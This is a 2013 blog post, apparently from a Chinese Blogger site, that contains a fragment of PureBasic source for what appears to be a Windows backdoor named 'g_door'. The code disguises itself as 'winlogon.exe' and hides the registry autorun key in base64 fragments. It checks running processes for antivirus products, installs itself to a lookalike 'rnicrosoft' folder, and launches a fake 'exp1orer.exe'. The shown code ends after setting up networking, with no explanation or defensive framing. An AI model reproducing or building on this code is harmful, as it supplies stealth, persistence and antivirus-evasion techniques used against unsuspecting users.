2013年6月18日 星期二
g_door init
path.s=""
If para <> ""
Select para
Case "rar_back"
MoveFileEx_("C:\Program Files\WinRAR\WinRAR32.exe","C:\Program Files\WinRAR\WinRAR.exe",3)
EndSelect
EndIf
timeup.l=0
If OpenWindow(0, 0, 0, 0, 0, "winlogon.exe", 268435456)
test.s=""
test1.s="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb"
test2.s = "cUnVu"
test3.s=""
dec.s = Space(1024)
i.l=-100
Repeat
Select WindowEvent()
Case #PB_Event_CloseWindow
End
EndSelect
test3=test1+Str(i)+test2
Base64Decoder(@test3, StringByteLength(test3), @dec, 1024)
test = dec
i=i+1
timeup=timeup+1
Until timeup=600
EndIf
;ListProcess(Process())
GetProcessList(Process())
av.s="none|"
os.s=""
is64.s=""
ForEach Process()
Select LCase(GetFilePart(Process()\path))
Case "avgtray.exe"
av="AVG|"
Break
Case "avgnt.exe"
av="Avira|"
Break
Case "mcagent.exe"
av="Mcafee|"
Break
Case "avp.exe"
av="Kaspersky|"
Break
Case "ccsvchst.exe"
av="Norton|"
Break
Case "egui.exe"
av="Nod|"
Break
Case "360tray.exe"
av="360|"
Break
Case "rstray.exe"
av="Rs|"
Break
EndSelect
Next
If FileSize("C:\Program Files\AVAST Software\Avast\AvastUI.exe")<>-1 Or FileSize("C:\Program Files (x86)\AVAST Software\Avast\AvastUI.exe")<>-1
av="Avast|"
;MessageRequester("","avast")
EndIf
;GetFileversioninfo()
ClearList(Process())
If sgl_Is64BitOS()
is64="64"
Else
is64="32"
EndIf
Select OSVersion()
Case #PB_OS_Windows_Server_2003
os="2003|"
Case #PB_OS_Windows_Vista
os="Vista|"
Case #PB_OS_Windows_Server_2008
os="2008|"
Case #PB_OS_Windows_7
os="Win7|"
Case #PB_OS_Windows_2000
os="2000|"
Case #PB_OS_Windows_XP
os="XP|"
Case 100
os="Win8|"
Default
os="Unknown|"
EndSelect
If #install=1
If os = "Win7|" Or os = "Vista|" Or os = "2008|" Or os="Win8|" ;And is64="32"
path=GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\Program Files\Common Files\rnicrosoft\"
Else
path=GetEnvironmentVariable("CommonProgramFiles")+"\rnicrosoft\"
EndIf
If ProgramFilename()<>path+#exename
checkinstall(av,os,is64)
EndIf
EndIf
If FileSize(GetPathPart(ProgramFilename())+"exp1orer.exe")<>-1
RunProgram("exp1orer.exe")
EndIf
If ininet=0
If InitNetwork() = 0
Debug("Can't initialize the network !")
End
EndIf
EndIf
timer.l=0
quit.l=0
reclen.l=0
command.l=0
img.l=0
filepath.s=""
buflen.l=0
filesize=0
nowfilesize=0
SetErrorMode_(1)
*Buffer = AllocateMemory(8192)
*Buffer2 = AllocateMemory(8192)
status=-1
訂閱:
張貼留言 (Atom)
沒有留言:
張貼留言